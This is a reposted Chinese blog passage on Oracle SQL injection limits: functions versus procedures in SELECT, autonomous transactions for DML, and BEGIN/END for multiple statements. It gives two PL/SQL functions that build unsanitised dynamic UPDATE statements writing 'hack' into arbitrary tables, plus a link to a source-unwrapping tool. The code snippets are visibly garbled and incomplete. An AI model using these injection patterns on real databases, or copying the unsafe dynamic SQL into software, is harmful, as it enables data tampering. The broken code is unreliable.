1. 查询语句后只能直接调用函数,不能直接调用存储过程,例如:select function() from dual可以,select procedure() from dual不行;
2. 查询语句中无法执行DML或DDL操作,也就是说如果被调用的函数里有insert、update、delete、create之类的写操作,就会报错,除非函数被声明为自治事务,关键字PRAGMA AUTONOMOUS_TRANSACTION;
<code>create</code> <code>or</code> <code>replace</code> <code>function</code> <code>funinject(ftable varchar2, fcol varchar2) </code><code>return</code>
<code>pragma autonomous_transaction;</code>
<code>my_sql varchar2(1000);</code>
<code>begin</code>
<code> </code><code>my_sql := </code><code>'update '</code><code>|| ftable || </code><code>' sets '</code><code>|| fcol ||</code><code>'='</code><code>'hack'</code><code>''</code><code>;</code>
<code> </code><code>execute</code> <code>immediate my_sql;</code>
<code> </code><code>commit</code><code>;</code>
<code> </code><code>return</code> <code>'inject'</code>
<code>end</code> <code>funinject</code>
3. 如果函数中有insert、update、delete、create之类的写操作,则只能注入到insert、update、delete之类的子查询里,例如:insert into table values(1,select function() from dual);
4. Oracle不能注入多语句,除非被注入的SQL动态语句在begin和end之间例如:
<code>create</code> <code>or</code> <code>replace</code> <code>function</code> <code>funinjecting(ftable varchar2, fcol varchar2) </code><code>return</code> <code>varchar2 </code>
<code>is</code> <code>my_sql varchar2(1000);</code>
<code> </code><code>my_sql := </code><code>'begin update '</code><code>|| ftable || </code><code>' set '</code><code>||fcol||</code><code>'='</code><code>'hack'</code><code>';end;'</code><code>;</code>
<code>end</code> <code>funinjecting</code>
unwrap Oracle SQL源码的工具
<a href="http://yun.baidu.com/s/1kTgP2SZ" target="_blank">http://yun.baidu.com/s/1kTgP2SZ</a>
本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1874070,如需转载请自行联系原作者
![阿里云天池龙珠计划SQL训练营day1[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)